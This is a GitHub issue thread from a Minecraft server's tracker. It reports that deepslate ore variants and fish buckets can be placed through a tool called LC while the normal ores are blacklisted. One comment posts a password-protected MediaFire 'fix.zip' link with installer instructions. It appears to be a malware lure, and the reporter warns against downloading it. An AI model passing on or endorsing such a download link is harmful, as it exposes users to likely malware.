### ISSUE TITLE
Ores avaliable in LC!!! + More

### ISSUE THREAD

**Issue by wowj2** [Lord-of-the-Craft/tracker#463]
**Minecraft Username**
wowj

**Describe the bug**
Every single deepslate variant of the ores is able to be placed in LC, the normal variants are blacklisted.

This may or may not be intentional aswell but buckets of fish [all variants] are also unbanned, and costs nothing to place down, meaning it is possible to farm infinite fish with LC.

**How did this occur**
LC, type 'DEEPSLATE [Insert Ore] compare with normal variants which are blacklisted.

Same thing with bucket fish.

**Expected behavior**
BLACKLISTED.

**Screenshots**

![blacklisted](https://github.com/user-attachments/assets/1a4c5e92-14e7-4646-8eaf-bf1394591186)

**Minecraft version:**
1.20.6 Vanilla

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wowj2** [comment]
do not download that

**Comment by wowj2** [comment]
PATCHED.
